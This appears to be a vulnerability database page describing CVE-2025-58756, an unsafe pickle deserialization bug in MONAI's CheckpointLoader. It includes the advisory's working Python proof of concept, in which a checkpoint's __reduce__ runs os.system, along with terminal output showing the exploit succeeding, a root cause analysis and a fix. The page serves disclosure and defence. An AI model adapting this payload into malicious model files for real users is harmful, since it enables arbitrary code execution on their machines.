8.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-58756

GHSA ID

GHSA-6vm5-6jv9-rjpj

EPSS Score

0.22584%

CWE

CWE-502

Published

9/9/2025

Updated

9/9/2025

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-58756

CVE-2025-58756: MONAI: Unsafe torch usage may lead to arbitrary code execution

Summary

In model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True) in monai/bundle/scripts.py , weights_only=True is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints.

This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from platforms like huggingface.

Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution.

The following proof-of-concept demonstrates the issues that arise when loading insecure checkpoints.


import os  
import tempfile  
import json  
import torch  
from pathlib import Path  
  
class MaliciousPayload:  
    def __reduce__(self):  
        return (os.system, ('touch /tmp/hacker2.txt',))  
  
def test_checkpoint_loader_attack():  

      

    temp_dir = Path(tempfile.mkdtemp())  
    checkpoint_file = temp_dir / "malicious_checkpoint.pt"  
      

    malicious_checkpoint = {  
        'model_state_dict': MaliciousPayload(),  
        'optimizer_state_dict': {},  
        'epoch': 100  
    }  
      

    torch.save(malicious_checkpoint, checkpoint_file)  
      
     
    from monai.handlers import CheckpointLoader  
    import torch.nn as nn  
          
 
    model = nn.Linear(10, 1)  
        
    loader = CheckpointLoader(  
        load_path=str(checkpoint_file),  
        load_dict={"model": model}  
    )  
          
    class MockEngine:  
        def __init__(self):  
            self.state = type('State', (), {})()  
            self.state.max_epochs = None  
            self.state.epoch = 0  
          
    engine = MockEngine()  
    loader(engine)  
          
          
    proof_file = "/tmp/hacker2.txt"  
    if os.path.exists(proof_file):  
        print("Succes")  
        #os.remove(proof_file)  
        return True  
    else:  
        print("False")  
        return False  
  
if __name__ == "__main__":   
    success = test_checkpoint_loader_attack()

Because my test environment is missing some content, an error will be reported during operation, but the operation is still executed.

root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  checkpoint_pwned.txt  hacker1.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid  tmpgjp8145d  tmpi3_u3wn8  tmpjvuhwif6  tmpkocoo34q  tmpp3q8occa
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python p2.py 
Traceback (most recent call last):
  File "/root/autodl-tmp/mmm/p2.py", line 61, in <module>
    success = test_checkpoint_loader_attack()  
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/autodl-tmp/mmm/p2.py", line 48, in test_checkpoint_loader_attack
    loader(engine)  
    ^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/monai/handlers/checkpoint_loader.py", line 146, in __call__
    Checkpoint.load_objects(to_load=self.load_dict, checkpoint=checkpoint, strict=self.strict)
  File "/root/miniconda3/lib/python3.12/site-packages/ignite/handlers/checkpoint.py", line 624, in load_objects
    _tree_apply2(_load_object, to_load, checkpoint_obj)
  File "/root/miniconda3/lib/python3.12/site-packages/ignite/utils.py", line 209, in _tree_apply2
    _tree_apply2(func, _CollectionItem.wrap(x, k, v), y[k])
  File "/root/miniconda3/lib/python3.12/site-packages/ignite/utils.py", line 216, in _tree_apply2
    return func(x, y)
           ^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/ignite/handlers/checkpoint.py", line 613, in _load_object
    obj.load_state_dict(chkpt_obj, **kwargs)
  File "/root/miniconda3/lib/python3.12/site-packages/torch/nn/modules/module.py", line 2581, in load_state_dict
    raise RuntimeError(
RuntimeError: Error(s) in loading state_dict for Linear:
        Missing key(s) in state_dict: "weight", "bias". 
        Unexpected key(s) in state_dict: "model_state_dict", "optimizer_state_dict", "epoch". 
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  checkpoint_pwned.txt  hacker1.txt  hacker2.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid  tmpgjp8145d  tmpi02txakb  tmpi3_u3wn8  tmpjvuhwif6  tmpkocoo34q  tmpp3q8occa

Impact

Leading to arbitrary command execution

Fix suggestion

Use a safe method to load, or force weights_only=True

(GitHub Advisory)

8.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-58756

GHSA ID

GHSA-6vm5-6jv9-rjpj

EPSS Score

0.22584%

CWE

CWE-502

Published

9/9/2025

Updated

9/9/2025

KEV Status

Technology

Python

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
monai	pip	<= 1.5.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from the insecure use of torch.load for model deserialization within the MONAI library. The root cause is the failure to consistently use the weights_only=True parameter, which was introduced to mitigate deserialization attacks. When this parameter is False or absent (in older torch versions), torch.load uses Python's pickle module, which can be exploited to execute arbitrary code if a maliciously crafted model file is loaded.

Two primary vulnerable functions were identified:

CheckpointLoader.__call__: This is the most critical vulnerable function. It is located in monai/handlers/checkpoint_loader.py and explicitly sets weights_only=False in its call to torch.load. This makes it unconditionally vulnerable, regardless of the installed torch version. The provided proof-of-concept and stack trace directly point to this function as the entry point for the attack.
_run_net_with_config: This function, found in monai/bundle/scripts.py, is conditionally vulnerable. It loads pretrained network weights and includes a check for the torch version. If the version is below 1.13, it calls torch.load without the weights_only parameter, creating a security risk. While a mitigating check is in place, environments with older torch installations remain exposed.

The analysis confirms that the vulnerability is not isolated to a single point but exists in different parts of the codebase with varying conditions for exploitation. The primary remediation would be to enforce the use of weights_only=True in all torch.load calls or to accept the risk and allow users to disable it explicitly only when loading trusted models.

Vulnerable functions

CheckpointLoader.__call__

monai/handlers/checkpoint_loader.py

The function explicitly calls `torch.load` with the `weights_only` parameter set to `False`. This makes it vulnerable to arbitrary code execution through the deserialization of a malicious model file, as the file is processed with Python's `pickle` module. The provided proof-of-concept directly exploits this function.

_run_net_with_config

monai/bundle/scripts.py

This function loads a model using `torch.load`. While it attempts to use the secure `weights_only=True` parameter for torch versions 1.13 and newer, it falls back to an insecure call without this parameter on older torch versions. This makes the function vulnerable to arbitrary code execution on systems with torch versions older than 1.13.

WAF Protection Rules

WAF Rule

### Summ*ry In ```mo**l_*i*t = tor**.lo**(*ull_p*t*, m*p_lo**tion=tor**.**vi**(**vi**), w*i**ts_only=Tru*)``` in mon*i/*un*l*/s*ripts.py , ```w*i**ts_only=Tru*``` is lo**** s**ur*ly. *ow*v*r, ins**ur* lo**in* m*t*o*s still *xist *ls*w**r* in t** proj

Reasoning

T** vuln*r**ility st*ms *rom t** ins**ur* us* o* `tor**.lo**` *or mo**l **s*ri*liz*tion wit*in t** MON*I li*r*ry. T** root **us* is t** **ilur* to *onsist*ntly us* t** `w*i**ts_only=Tru*` p*r*m*t*r, w*i** w*s intro*u*** to miti**t* **s*ri*liz*tion *t

8.8

Basic Information

Concerned about an active attack path?

CVE-2025-58756: MONAI: Unsafe torch usage may lead to arbitrary code execution

Summary

Impact

Fix suggestion

8.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI